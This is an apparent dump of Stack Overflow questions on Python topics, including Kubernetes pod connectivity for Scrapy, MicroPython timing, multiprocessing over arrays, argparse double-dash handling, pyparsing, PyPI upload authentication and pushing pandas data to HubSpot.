AsyncioSelectorReactor. 2024-01-09 21:53:27+0000 [-] Running with reactor: AsyncioSelectorReactor. </code></pre> <p>
</p> <p><strong>Issue:</strong> Despite these configurations, no requests seem to reach the Scrapy pod. Logs from kubectl logs show that ScrapyRT instances start successfully on the specified ports. However, when I send requests from a separate debug pod running a Python Jupyter Notebook, they succeed for other pods but not for the Scrapy pod.</p> <p><strong>Question:</strong> How can I successfully connect to the Scrapy pod? What might be preventing the requests from reaching it?</p> <p>Any insights or suggestions would be greatly appreciated.</p> <h1>Repair Attempts And Results</h1> <h3>Milind's Suggestions</h3> <ul> <li><em>verify that selector field in the service YAML (scrapy-service) matches the labels in the deployment YAML (scrapy-deployment). The labels should be the same to correctly select the pods.</em> Yes, the selector field in the service yaml matches the labels in the deployment yaml.</li> </ul> <h5>scrapy-service.yaml</h5> <pre><code>apiVersion: v1 kind: Service metadata: name: scrapy-service spec: selector: app: scrapy-pod ports: - protocol: TCP port: 14805 targetPort: 14805 type: ClusterIP </code></pre> <h5>scrapy-service.yaml</h5> <pre><code>apiVersion: apps/v1 kind: Deployment metadata: name: scrapy-deployment labels: app: scrapy-pod spec: replicas: 1 selector: matchLabels: app: scrapy-pod template: metadata: labels: app: scrapy-pod spec: containers: - name: scrapy-pod ... </code></pre> <ul> <li><em>Did you check in the logs to see if there are any error messages or indications that the requests are being received?????</em> Yes, I checked the logs but I get no indication the requests are being received. Here's the series of steps I do to check this.</li> </ul> <p>Get all the pods:</p> <pre><code>&gt; k get po NAME READY STATUS RESTARTS AGE express-app-deployment-545f899f88-zq58r 1/1 Running 0 2d8h jupyter-debug-pod 1/1 Running 0 31h scrapy-deployment-56b9d66858-wfhpk 1/1 Running 0 31h </code></pre> <p>Get all the pods and show their IP:</p> <pre><code>&gt; k get po -o wide NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES express-app-deployment-545f899f88-zq58r 1/1 Running 0 2d8h 10.244.0.191 pool-6snxmm4o8-xd7ds &lt;none&gt; &lt;none&gt; jupyter-debug-pod 1/1 Running 0 31h 10.244.1.14 pool-6snxmm4o8-xz05i &lt;none&gt; &lt;none&gt; scrapy-deployment-56b9d66858-wfhpk 1/1 Running 0 31h 10.244.1.96 pool-6snxmm4o8-xz05i &lt;none&gt; &lt;none&gt; </code></pre> <p>Check the scrapy-deployment logs:</p> <pre><code>&gt; k logs scrapy-deployment-56b9d66858-wfhpk -f 2024-01-13 23:55:55+0000 [-] Log opened. 2024-01-13 23:55:55+0000 [-] Site starting on 14805 2024-01-13 23:55:55+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f6b6fe04460&gt; 2024-01-13 23:55:55+0000 [-] Running with reactor: AsyncioSelectorReactor. </code></pre> <p>Check the services:</p> <pre><code>&gt; k get svc NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE express-backend-service ClusterIP 10.245.59.90 &lt;none&gt; 80/TCP 9d scrapy-service ClusterIP 10.245.129.89 &lt;none&gt; 14805/TCP 31h </code></pre> <p>In a separate terminal, I exec into the jupyter-debug-pod:</p> <pre><code>&gt; k exec -it scrapy-deployment-56b9d66858-wfhpk -- /bin/bash root@scrapy-deployment-56b9d66858-wfhpk:/usr/src/app# </code></pre> <p>nslookup scrapy-service:</p> <pre><code># nslookup scrapy-service Server: 10.245.0.10 Address: 10.245.0.10#53 Name: scrapy-service.default.svc.cluster.local Address: 10.245.129.89 </code></pre> <p>So, it SEES <code>scrapy-service</code> AND the <code>10.245.0.10</code> which I don't see mentioned previously.</p> <p>When I curl <code>express-backend-service</code>, it works as expected:</p> <pre><code># curl express-backend-service &lt;!DOCTYPE html&gt; &lt;html lang=&quot;en&quot;&gt; &lt;head&gt; &lt;meta charset=&quot;UTF-8&quot; /&gt; &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot; /&gt; &lt;title&gt;HTTP Video Stream&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;video id=&quot;videoPlayer&quot; width=&quot;650&quot; controls muted=&quot;muted&quot; autoplay&gt; &lt;source src=&quot;/video/play&quot; type=&quot;video/mp4&quot; /&gt; &lt;/video&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>But when I curl <code>scrapy-service</code> it just hangs then fails:</p> <pre><code>#curl scrapy-service curl: (28) Failed to connect to scrapy-service port 80 after 130552 ms: Connection timed out </code></pre> <p>Even when I try adding the <strong>14805 port</strong> it still fails:</p> <pre><code># curl scrapy-service:14805 curl: (7) Failed to connect to scrapy-service port 14805 after 6 ms: Connection refused </code></pre> <ul> <li><em>Did you verified that the DNS resolution is working within the cluster and the name (scrapy-service) can be resolved?????</em></li> </ul> <p>Yes, the scrapy-service is successfully resolving to an internal cluster IP address (10.245.129.89).</p> <ul> <li><strong>Did you verified that if there are any firewall rules that might be blocking traffic between pods within the cluster?????</strong></li> </ul> <p>I checked my Digital Ocean control panel's firewall settings and saw for Outbound Rules, all ports were set up. However, I did notice that for Inbound Rules, I had nothing set up. Perhaps this was the issue? I immediately set up 2 rules, one for TCP (All ports/All IPv4/All IPv6) and the same for UDP and ICMP. However, after making the changes, deleting the service and deployment, then recreating the service and deployment from scratch, it still did not solve the issue.</p> <ul> <li><em>Did you tried ping or telnet to check connectivity between pod and cluster????</em></li> </ul> <p>Yeah tried that, it failed too.</p> <p>Here's the result of telnet:</p> <pre><code># telnet scrapy-service.default.svc.cluster.local Trying 10.245.24.22... telnet: Unable to connect to remote host: Connection timed out root@jupyter-debug-pod:/# telnet scrapy-service.default.svc.cluster.local 14805 Trying 10.245.24.22... telnet: Unable to connect to remote host: Connection refused </code></pre> <p>Here's the result of ping:</p> <pre><code># ping scrapy-service.default.svc.cluster.local PING scrapy-service.default.svc.cluster.local (10.245.24.22) 56(84) bytes of data. --- scrapy-service.default.svc.cluster.local ping statistics --- 1295 packets transmitted, 0 received, 100% packet loss, time 1325042ms </code></pre> <ul> <li><em>I can see that The scrapy-service is of type ClusterIP, which means it's an internal service. This wont work if you need external access.Double check it pls.Try changing it to NodePort or LoadBalancer to gain external access.</em></li> </ul> <p>Ok, I changed <strong>scrapy-service.yaml</strong> to NodePort like so:</p> <pre><code>apiVersion: v1 kind: Service metadata: name: scrapy-service spec: selector: app: scrapy-pod ports: - protocol: TCP port: 14805 targetPort: 14805 type: NodePort </code></pre> <p>After, I tried to do <code>curl scrapy-service</code> (after deleting and restarting the service):</p> <pre><code># curl scrapy-service curl: (28) Failed to connect to scrapy-service port 80 after 129976 ms: Connection timed out </code></pre> <p>This too failed.</p> <ul> <li><em>Lastly, verify if the pod is running.</em></li> </ul> <pre><code>&gt; k logs scrapy-deployment-56b9d66858-6xs9r -f 2024-01-15 07:33:04+0000 [-] Log opened. 2024-01-15 07:33:04+0000 [-] Site starting on 14805 2024-01-15 07:33:04+0000 [-] Starting factory &lt;twisted.web.server.Site object at 0x7f51f08fce20&gt; 2024-01-15 07:33:04+0000 [-] Running with reactor: AsyncioSelectorReactor. </code></pre> <p>As you can see above, the pod is running and gives logs.</p> <p>And so, now you can see my frustration with this after over a week being unable to solve this. There is another pod, express-app-deployment-545f899f88-zq58r which does NOT behave like this. It runs an Express.js app on port 8000 and the service for that, <strong>express-backend-service</strong>, works as expected.</p>
<python><node.js><docker><kubernetes><scrapy>
2024-01-12 22:06:55
2
692
rom
77,809,483
1,873,689
MicroPython sleep_us lies?
<p>Working on another project I faced something weird in working with time.<br /> Especially with <code>time.ticks_us()</code>.</p> <p>I am using the ESP32 S2 module.</p> <p>Code:</p> <pre><code>from time import ticks_us, sleep_us for i in range(100): t2 = ticks_us() sleep_us(1) t = ticks_us() - t2 print(t) </code></pre> <p>Not getting close to 1 μs.<br /> Min: 105 μs<br /> Max: 120 μs</p> <p>I remember that its Python (MicroPython in my case) but still.<br /> It also depends on the running frequency.</p> <p>Am I wrong?</p> <p>Is this &quot;mode&quot; is useless?</p>
<python><time><esp32><micropython>
2024-01-12 22:01:06
2
1,301
aleXela
77,809,438
10,759,785
How to use Python's multiprocessing library to parallelize a for loop that iterates a depth array?
<p>I work with well log data that has different values related to different depths. Very often I need to iterate over the depths, performing calculations, and storing these values in a previously created array to create new well logs. It is something equivalent to the example below.</p> <pre><code>import numpy as np depth = np.linspace(5000,6000,2001) y1 = np.random.random((len(depth),3)) y2 = np.random.random(len(depth)) def fun_1(y1, y2): return y1 + y2 def fun_2(y1, y2): return sum(y1 * y2) result_1 = np.zeros_like(y1) result_2 = np.zeros_like(y2) for i in range(len(depth)): prov_result_1 = fun_1(y1[i], y2[i]) prov_result_2 = fun_2(y1[i], y2[i]) result_1[i,:] = prov_result_1 result_2[i] = prov_result_2 </code></pre> <p>In the example, I go depth by depth using the y1 and y2 values to calculate provisory values prov_result_1 and prov_result_2, which I then store in the respective index of result_1 and result_2, generating my final result_1 and result_2 curves when the loop ends. It's easy to see that, depending on the size of the depth array and the functions I apply at each depth, things can get out of hand and this code can take several hours to complete. Keep in mind that the y1 and y2 arrays can be much larger and the functions I apply are much more complex than these.</p> <p>I would like to know if there is a way to use Python's multiprocessing library to parallelize this for loop. Other answers I've found here on StackOverflow don't directly translate to this problem and always seem to be much more complicated than they should be.</p> <p>One option I imagine would be to divide the depth by the number of processors and do this same for loop in parallel, something like:</p> <pre><code>num_pool = 2 depth_cut = (depth[-1]-depth[0])/num_pool depth_parallel = [depth[depth &lt;= depth[0] + depth_cut], depth[depth &gt; depth[0] + depth_cut]] y1_parallel = [y1[depth &lt;= depth[0] + depth_cut], y1[depth &gt; depth[0] + depth_cut]] y2_parallel = [y2[depth &lt;= depth[0] + depth_cut], y2[depth &gt; depth[0] + depth_cut]] </code></pre> <p>Only more generic. Then I would put the pieces of data into parallel processing, perform my calculations, and then concatenate everything again.</p>
<python><multithreading><numpy><performance><multiprocessing>
2024-01-12 21:49:39
1
331
Lucas Oliveira
77,809,386
119,527
How to capture all arguments after double dash (--) using argparse
<h2>Background</h2> <p>Many command-line utilities provide special handling for all arguments after a double dash (<code>--</code>). Examples:</p> <p><code>git diff</code>: All arguments after <code>--</code> are paths (which can start with <code>-</code>):</p> <pre><code>git diff [options] -- [path...] </code></pre> <p>Some wrapper tools use this to pass arbitrary arguments on to the tool they are wrapping -- even arguments which may conflict with their own!</p> <pre><code>foowrap -a -- -a 🠡 🠡 │ └─── Passed to wrapped tool └───────── Consumed by wrapper </code></pre> <h2>Problem</h2> <p>How can we accomplish this using <a href="https://docs.python.org/3/library/argparse.html" rel="noreferrer"><code>argparse</code></a>?</p>
<python><argparse>
2024-01-12 21:33:47
3
138,383
Jonathon Reinhart
77,809,374
21,305,238
How to specify a pyparsing expression that has two parts, the length of each may varies but their sum is fixed?
<p>I need to specify an expression that is defined as <code>a<sup><i>m</i></sup>b<sup><i>n</i></sup></code>, such that:</p> <ul> <li><code>m</code> + <code>n</code> = <code>t</code>; <code>t</code> is fixed</li> <li>0 &lt;= <code>m</code> &lt;= <code>t</code> - 1</li> <li>1 &lt;= <code>n</code> &lt;= <code>t</code></li> </ul> <p>Here's how the current code looks like, simplified:</p> <pre class="lang-py prettyprint-override"><code>from pyparsing import Char, Combine def ab(t): first = Char('a')[0, t - 1] second = Char('b')[1, t] expression = first + second expression.add_condition( lambda result: len(result) == t, message = f'Total length must be {t}' ) return Combine(expression) </code></pre> <p>The expression, however, consumes all it could find and calls the condition function on that result without backtracking. For example:</p> <pre class="lang-py prettyprint-override"><code>grammar = (ab(4) | Char('b'))[1, ...].set_name('grammar') grammar.parse_string('abbbb', parse_all = True) </code></pre> <pre class="lang-none prettyprint-override"><code>ParseException: Expected grammar, found 'abbbb' (at char 0), (line:1, col:1) </code></pre> <p>The result I want is <code>['abbb', 'b']</code>, which would be achieved if the expression in question was specified as:</p> <pre class="lang-py prettyprint-override"><code>expression = Or([ Char('a')[m] + Char('b')[t - m] for m in range(0, t) ]) </code></pre> <p>...but that looks unnecessarily verbose.</p> <p>Is there a better way?</p>
<python><pyparsing>
2024-01-12 21:31:28
1
12,143
InSync
77,809,352
2,417,922
Why doesn't "np.equal" (Numpy) work for me when executing under PyCharm?
<p>I'm trying to understand some curious behavior running Python <strong>under PyCharm</strong>. Here's the code:</p> <pre><code>import numpy as np s=&quot;aabaaaacaabc&quot; m=np.array( [ list( s ) ] * 3 ) print(&quot;m&quot;, m ) l=np.array([['a'],['b'],['c']] ) print( &quot;l&quot;, l ) x = np.equal( m, l ) </code></pre> <p>and here's what I get when I execute it:</p> <pre><code>C:\Users\marka\AppData\Local\Microsoft\WindowsApps\python3.10.exe &quot;C:\Users\marka\Leet Notebooks\.ipynb_checkpoints\NumpyQuestion.py&quot; m [['a' 'a' 'b' 'a' 'a' 'a' 'a' 'c' 'a' 'a' 'b' 'c'] ['a' 'a' 'b' 'a' 'a' 'a' 'a' 'c' 'a' 'a' 'b' 'c'] ['a' 'a' 'b' 'a' 'a' 'a' 'a' 'c' 'a' 'a' 'b' 'c']] l [['a'] ['b'] ['c']] Traceback (most recent call last): File &quot;C:\Users\marka\Leet Notebooks\.ipynb_checkpoints\NumpyQuestion.py&quot;, line 7, in &lt;module&gt; x = np.equal( m, l ) numpy.core._exceptions._UFuncNoLoopError: ufunc 'equal' did not contain a loop with signature matching types (&lt;class 'numpy.dtype[str_]'&gt;, &lt;class 'numpy.dtype[str_]'&gt;) -&gt; None Process finished with exit code </code></pre> <p>The reason I say &quot;curious&quot; is because this code runs correctly when run on my non-PyCharm Python interpreter. Is there something funky about PyCharm that's causing this?</p>
<python><numpy><pycharm>
2024-01-12 21:24:42
0
1,252
Mark Lavin
77,809,196
8,248,194
Getting Username/Password authentication is no longer supported. Migrate to API Tokens or Trusted Publishers instead
<p>When doing</p> <pre><code>python -m twine upload dist/* </code></pre> <p>in my computer I get:</p> <pre><code>Username/Password authentication is no longer supported. Migrate to API Tokens or Trusted Publishers instead. </code></pre> <p>I have in ~/pypirc the following data:</p> <pre><code>[distutils] index-servers = pypi cluster-experiments [pypi] username = david26694 password = pypi-XXXXX- [cluster-experiments] repository = https://upload.pypi.org/legacy/ username = david26694 password = pypi-XXXXX- </code></pre> <p>what am I doing wrong?</p>
<python><pypi>
2024-01-12 20:38:17
1
2,581
David Masip
77,809,173
2,805,482
How overlay a image to specific part on another image in opencv
<p>I have below image and I want to overlay a black patch on the right most side of the image. So I am resizing the both the images to specific size in below code and get only the non white part of overlay and paste it over the specific x,y coordinates but not getting the expected results. I looked into <code>cv2.addWeighted</code> but I dont find any option to specify the option use coordinates of where to paste the overlay. Can someone guide on how to achieve it in cv2?</p> <pre><code>vr_overlay = &quot;/Users/templates/vertical_overlay.png&quot; show_image = &quot;/Users/templates/image_3.png&quot; vr_overlay_co = (0, 0, 100, 412) img_size = (0, 0, 440, 412) img = cv2.imread(show_image) img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) v_overlay = cv2.imread(vr_overlay) resize_v_overlay = cv2.resize(v_overlay, (vr_overlay_co[2], vr_overlay_co[3])) plt.imshow(resize_v_overlay ,cmap='gray') plt.axis('off') plt.show() resize_img = cv2.resize(img_rgb, (img_size[2], img_size[3])) plt.imshow(resize_img ,cmap='gray') plt.axis('off') plt.show() resize_img[vr_overlay_co[1]: vr_overlay_co[1] + vr_overlay_co[3],vr_overlay_co[0]: vr_overlay_co[0] + vr_overlay_co[2]] = np.where(resize_v_overlay != [0, 0, 0], resize_img[vr_overlay_co[1]: vr_overlay_co[1] + vr_overlay_co[3], vr_overlay_co[0]: vr_overlay_co[0] + vr_overlay_co[2],], resize_v_overlay) plt.imshow(resize_img ,cmap='gray') plt.axis('off') plt.show() </code></pre> <p><a href="https://i.sstatic.net/hnfLo.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/hnfLo.png" alt="enter image description here" /></a></p> <p><a href="https://i.sstatic.net/Dolau.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Dolau.png" alt="enter image description here" /></a></p> <p>Expected result:</p> <p><a href="https://i.sstatic.net/XXv2Z.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/XXv2Z.png" alt="enter image description here" /></a></p>
<python><opencv><image-processing><transparency><alphablending>
2024-01-12 20:32:52
1
1,677
Explorer
77,809,095
896,112
Python syntactic sugar to generate identical instances of the same class?
<p>Let's say I have this simple class :</p> <pre class="lang-py prettyprint-override"><code>class Person: def __init__(self, name, id): self.name = name self.id = id </code></pre> <p>and the following instances :</p> <pre class="lang-py prettyprint-override"><code>tom = Person('Tom', 12) dick = Person('Dick', 14) harry = Person('Harry', 16) </code></pre> <p>but I want the user of my module to be able to create multiple instances of these people without having to call the <code>Person</code> constructor since the <code>name</code> and <code>id</code> should be declared in only one place.</p> <p>Options :</p> <ol> <li><p>Use <code>copy</code> or <code>deepcopy</code>. This will give the functionality I need but every time I want to use a <code>tom</code> I will have to remember to create a copy of him. That's clunky.</p> </li> <li><p>Create a <code>Tom</code> class</p> </li> </ol> <pre class="lang-py prettyprint-override"><code>class Tom(Person): def __init__(self): super().__init__('Tom', 12) </code></pre> <p>This is a bit cleaner since I can just do <code>Tom()</code> every time I want to a new <code>tom</code>, but this is a lot of code to write and not very DRY.</p> <p>Is there some other syntactic sugar available in Python that makes this kind of thing easier?</p>
<python>
2024-01-12 20:12:44
1
9,259
Carpetfizz
77,809,007
7,428,676
Importing pandas dataframe data to HubSpot CRM
<p>I need to send data which is in a pandas dataframe df. I need to import this data to Hubspot</p> <pre><code>from io import StringIO csv_data = StringIO() df.to_csv(csv_data, index=False) csv_data.seek(0) import requests import json # Your HubSpot API Key api_key = 'api_key' # HubSpot Import API endpoint endpoint = 'https://api.hubapi.com/crm/v3/imports' # Create a payload payload = { 'name': 'data source', 'files': [ { 'file_name': 'datasource.csv', 'fileData': csv_data.read() } ] } headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {api_key}' } # Make the request response = requests.post(endpoint, json=payload, headers=headers) if response.status_code == 200: print('Data import successful!') else: print(f'Data import failed with status code {response.status_code}: {response.text}') </code></pre> <p>I am getting this error:</p> <pre><code>Data import failed with status code 415: &lt;html&gt; &lt;head&gt; &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html;charset=utf-8&quot;/&gt; &lt;title&gt;Error 415 Unsupported Media Type&lt;/title&gt; &lt;/head&gt; &lt;body&gt;&lt;h2&gt;HTTP ERROR 415&lt;/h2&gt; &lt;p&gt;Reason: &lt;pre&gt; Unsupported Media Type&lt;/pre&gt;&lt;/p&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>The endgoal is to get the data from the dataframe in HubSpot. Any way to resolve this?</p>
<python><pandas><hubspot>
2024-01-12 19:54:21
1
564
IronMaiden
77,808,931
1,874,170
Deducing console codepage when PEP 528 may or may not be implemented?
<p>I've got some code that needs to print certain non-ASCII characters to the console, when the console might not be in UTF-8 mode.</p> <p>On Linux and Mac, it's <em>simply</em> the responsibility of anyone rowdy enough to use a non UTF-8 terminal to set <code>LANG</code> <a href="https://drj11.wordpress.com/2007/05/14/python-how-is-sysstdoutencoding-chosen/#:%7E:text=BUT%20WHERE%20THE%20HELL%20IS%20THIS%20DOCUMENTED%3F" rel="nofollow noreferrer">and <code>LC_CTYPE</code></a>* appropriately. And on Windows with CPython ≥3.6, the PSF handles this with <a href="https://peps.python.org/pep-0528/" rel="nofollow noreferrer">PEP 528</a>.</p> <p>*If you're reading this in the future (on CPython ≥3.15) it looks like <a href="https://peps.python.org/pep-0686/" rel="nofollow noreferrer">that'll be <code>PYTHONIOENCODING</code></a>.</p> <p>However, that still leaves un-handled the case of people using something like PyPy on Windows. In that case, Python starts up naïvely with <code>sys.stdout.encoding == 'utf-8'</code>, <strong>regardless</strong> of the actual codepage the terminal is using (and there's no &quot;rowdy user&quot;, Homebrew maintainer, or Linux distribution administrator to be held responsible for not setting good env vars in this case.).</p> <p>I'm currently working around it by just setting <code>sys.stdout.encoding</code> to whatever <code>chcp</code> says whenever &quot;PyPy on Windows&quot; is detected, but this will fail when PyPy implements PEP 528:</p> <pre class="lang-py prettyprint-override"><code>import platform import re import subprocess import sys #import colorama def fixit(): # implementation note: MUST be run before the first read from stdin. # (stdout and sterr may be already written-to, albeit maybe corruptedly.) if platform.system() == 'Windows': #colorama.just_fix_windows_console() if platform.python_implementation() == 'PyPy': if sys.pypy_version_info &gt; (7, 3, 15): import warnings warnings.warn(&quot;Applying workaround for https://github.com/pypy/pypy/issues/2999&quot;) chcp_output = subprocess.check_output(['chcp.com'], encoding='ascii') cur_codepage = int(re.match(r'Active code page: (\d+)', chcp_output).group(1)) cur_encoding = WINDOWS_CODEPAGES[cur_codepage] for f in [sys.stdin, sys.stdout, sys.stderr]: if f.encoding != cur_encoding f.reconfigure(encoding=cur_encoding) WINDOWS_CODEPAGES = { 437: 'ibm437', 850: 'ibm850', 1252: 'windows-1252', 28591: 'iso-8859-1', 28592: 'iso-8859-2', 28593: 'iso-8859-3', 65000: 'utf-7', 65001: 'utf-8' } </code></pre> <p>Now, it seems to me to me that calling <code>sys.stdout.reconfigure(encoding=sys.stdout._TTY_CODEPAGE)</code> whenever <code>sys.stdout.encoding != sys.stdout._TTY_CODEPAGE</code> is a <strong>very sane and correct thing to do</strong>.</p> <p>But that leaves me with the question: just exactly <em>how</em> can I get <code>sys.stdout._TTY_CODEPAGE</code> on Windows, when PEP 528 might-or-might-not be implemented?</p>
<python><character-encoding><future-proof>
2024-01-12 19:36:31
2
1,117
JamesTheAwesomeDude
77,808,731
5,036,928
NumPy Get elements based on starting indices and stride
<p>I am looking for the numpythonic way to accomplish the following:</p> <pre><code>A = np.arange(1000) x = np.array([0, 10, 20, 30], dtype=int) dx = np.array([3, 4, 5, 6], dtype=int) for x_, dx_ in zip(x, dx): print(A[x_:x_+dx_]) </code></pre> <p>Looking at <a href="https://stackoverflow.com/questions/48920850/how-can-i-extract-multiple-random-sub-sequences-from-a-numpy-array?noredirect=1&amp;lq=1">similar answers</a> and the <a href="https://numpy.org/doc/stable/reference/generated/numpy.lib.stride_tricks.as_strided.html" rel="nofollow noreferrer">as_strided documentation</a> it doesn't seem like I can provide varying stride/window lengths. Is there a pure numpy way to accomplish this?</p>
<python><numpy><numpy-slicing>
2024-01-12 18:51:57
1
1,195
Sterling Butters
77,808,666
11,357,623
nested directories and classes in a python library
<h1>Efficient Imports</h1> <p>I have several nested directories in this library I'm building, some nested directories have no files but other directories, or each directory has one or more class files.</p> <p>The library is basically getting ported from another language, and I have to keep the structure same.</p> <p>I'm looking for code organization and module access without repetition in the import statements</p> <pre><code>mylib ├── foo │ ├── bar │ └── baz.py (class Baz) ├ test ── foo ├── bar ── test_baz.py </code></pre> <p>The problem I have is with the repetition in my import statement</p> <p><code>from mylib.foo.bar.baz import Baz</code></p> <p>is there a way I can avoid <code>.baz</code> in the import statement?</p> <h2>Attempt (without any real success)</h2> <p>within the <code>__init__</code> file, I tried without any real effect.</p> <pre><code>import baz.baz import Baz __all__ = [ &quot;Baz&quot; ] </code></pre>
<python>
2024-01-12 18:39:11
1
2,180
AppDeveloper
77,808,612
7,648,377
Python test fail while function works in isolation
<p>This is the function</p> <pre><code>def update_content_if_reusable(content_data): &quot;&quot;&quot; Add reusable counter &quot;&quot;&quot; content = json.loads(content_data) if 'layouts' in content: for layout in content['layouts'].values(): if 'isReusable' in layout: content['reusableBlocks'] += 1 return json.dumps(content, indent=4) </code></pre> <p>The error in test</p> <pre><code>_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ content_data = '&quot;{\\n \\&quot;page\\&quot;: {\\n \\&quot;layouts\\&quot;: []\\n },\\n \\&quot;reusableBlocks\\&quot;: 0,\\n \\&quot;layouts\\&quot;: {},\\n \\&quot;columns\\&quot;: {},\\n \\&quot;components\\&quot;: {}\\n}&quot;' def update_content_if_reusable(content_data): &quot;&quot;&quot; Add reusable counter &quot;&quot;&quot; content = json.loads(content_data) if 'layouts' in content: &gt; for layout in content['layouts'].values(): E TypeError: string indices must be integers models.py:82: TypeError </code></pre> <p>The python version is 3.6</p> <p><a href="https://www.online-python.com/5VH28jsWYQ" rel="nofollow noreferrer">https://www.online-python.com/5VH28jsWYQ</a></p>
<python>
2024-01-12 18:29:48
1
2,762
Andrei Lupuleasa
77,808,549
711,855
Shared variable & threading.Lock
<p>In Java, unless you use atomic operations or some other thread sync mechanism, you might have stalled values for a shared variable in a thread.</p> <p>Given the GIL, in CPython. I see the value of a Lock inc cases where: Multiple steps are taken before assigning a value, even in the confusing <code>a += 1</code> idiom. To prevent race condition.</p> <p>But in a case like <code>a = 1</code>, without a Lock. is it possible to have threads A and B reading different values of a after some thread updated it?</p> <p>Another way of asking this question would be, does Lock ensures shared value propagation and lack of Lock does not?</p>
<python><multithreading><synchronization><locking>
2024-01-12 18:15:12
1
2,004
juanmf
77,808,548
8,022,306
How to use Django's ORM to update the value for multiple keys in a JsonField using .update() method?
<p>I have a model field I am trying to update using Django's <code>.update()</code> method. This field is a JsonField. I am typically saving a dictionary in this field. e.g. <code>{&quot;test&quot;: &quot;yes&quot;, &quot;prod&quot;: &quot;no&quot;}</code></p> <p>Here is the model:</p> <pre><code>class Question(models.Model): # {&quot;test&quot;: &quot;yes&quot;, &quot;prod&quot;: &quot;no&quot;} extra_data = models.JSONField(default=dict, null=True, blank=True) </code></pre> <p>I am able to update a key inside the dictionary using this query (which works fine by the way):</p> <pre><code>Question.filter(id=&quot;123&quot;).update(meta_data=Func( F(&quot;extra_data&quot;), Value([&quot;test&quot;]), Value(&quot;no&quot;, JSONField()), function=&quot;jsonb_set&quot;, )) </code></pre> <p>The question now is, is there a way I can update the multiple keys at once(in my own case, two) using the <code>.update()</code> as shown in the above query?</p> <p>I want to use the <code>.update()</code> method instead of <code>.save()</code> to achieve this so I can avoid calling a post_save signal function.</p>
<python><django>
2024-01-12 18:14:56
2
422
Toluwalemi
77,808,447
2,142,728
Where is the selected Python interpreter path stored in Visual Studio Code (workspace)?
<p>I am using Visual Studio Code for my Python development, and I can select the Python interpreter through the UI by using cmd + shift + p and then choosing Python: Select interpreter.</p> <p>I've checked the <code>&lt;project&gt;/.vscode/settings.json</code> file, but I couldn't find the information about the selected Python interpreter there (it's actually empty <code>{}</code>). Can someone please guide me on where Visual Studio Code stores the information about the selected Python interpreter? I would like to know the location of this setting, as I'm working with multiple projects in a monorepo, and the interpreter/venv seems to be automatically activated whenever I open the terminal. But sometimes the wrong one is picked. Pretty annoying</p> <p>Your help is much appreciated!</p>
<python><visual-studio-code><python-poetry>
2024-01-12 17:52:27
0
3,774
caeus
77,808,398
10,155,763
ECS Scheduled Task Start and End Time
<p>How do i get the start and end time of an ECS scheduled task using CLI or SDK?</p> <pre><code>aws events describe-rule </code></pre> <p>only provides basic information with no start and end time.</p>
<python><amazon-ecs><aws-fargate><aws-event-bridge>
2024-01-12 17:41:46
1
325
manoman687
77,808,349
4,506,929
How do I call Python scripts from within a Python script such that the hierarchy information is always retained?
<p>I'd like to run a few scripts within a script such that</p> <ol> <li>Know when a script is being called from another script and when it's run directly</li> <li>Be able to get information/variables from the parent script into the child script.</li> </ol> <p>Here's an illustration of what I mean. Say I have files <code>mwe1.py</code> and <code>mwe2.py</code> with only one line of code:</p> <pre class="lang-py prettyprint-override"><code>print(__name__) </code></pre> <p>And say I have another script (<code>mwe0.py</code>) with:</p> <pre class="lang-py prettyprint-override"><code>print(__name__) exec(open(&quot;mwe1.py&quot;).read()) exec(open(&quot;mwe2.py&quot;).read()) </code></pre> <p>If I run <code>mwe0.py</code> all the code runs, but the hierarchy isn't preserved and (I think) I have no way of knowing from within <code>mwe1.py</code> that it was called by another script:</p> <pre class="lang-py prettyprint-override"><code>In [4]: %run mwe0.py __main__ __main__ __main__ </code></pre> <p>But maybe there's a better way to get hierarchy information than just <code>__main__</code>? Is there a way to do what I want?</p>
<python><ipython>
2024-01-12 17:30:14
1
3,547
TomCho
77,808,303
6,817,610
Property decorator without object attribute
<p>I have a class like this that contains property but doesn't have corresponding attribute:</p> <pre><code>class Example(object): def __init__(self, csv_dict): self._csv_dict = csv_dict @property def name(self): return self[&quot;name&quot;] @property def number(self): try: return round(float(self[&quot;number&quot;]), 2) except ValueError: return None def __getitem__(self, field_name): value = self._csv_dict.get(field_name) if value: value = value.strip() return value </code></pre> <p>I'm trying to modify number but I can't seem to set it. Tried this:</p> <pre><code>example.number.setter(5) </code></pre> <p>this:</p> <pre><code>@number.setter def number(self, new_number): self._number = new_number # and this self.number = new_number example.number = 5 </code></pre> <p>Getting these errors:</p> <pre class="lang-none prettyprint-override"><code>AttributeError: 'float' object has no attribute 'setter AtributeError: can't set attribute </code></pre>
<python><class><object>
2024-01-12 17:21:59
1
953
Anton Kim
77,808,253
1,473,517
How to replace Counter to use numpy code only
<p>I have this code:</p> <pre><code>from collections import Counter import numpy as np def make_data(N): np.random.seed(40) g = np.random.randint(-3, 4, (N, N)) return g N = 100 g = make_data(N) n = g.shape[0] sum_dist = Counter() for i in range(n): for j in range(n): dist = i**2 + j**2 sum_dist[dist] += g[i, j] sorted_dists = sorted(sum_dist.keys()) for i in range(1, len(sorted_dists)): sum_dist[sorted_dists[i]] += sum_dist[sorted_dists[i-1]] # print(sum_dist) print(max(sum_dist, key=sum_dist.get)) </code></pre> <p>The output is 7921.</p> <p>I want to convert it into numpy only code and get rid of Counter. How can I do that?</p>
<python><numpy>
2024-01-12 17:12:41
1
21,513
Simd
77,808,226
10,645,965
Pydantic: pass the entire dataset to a nested field
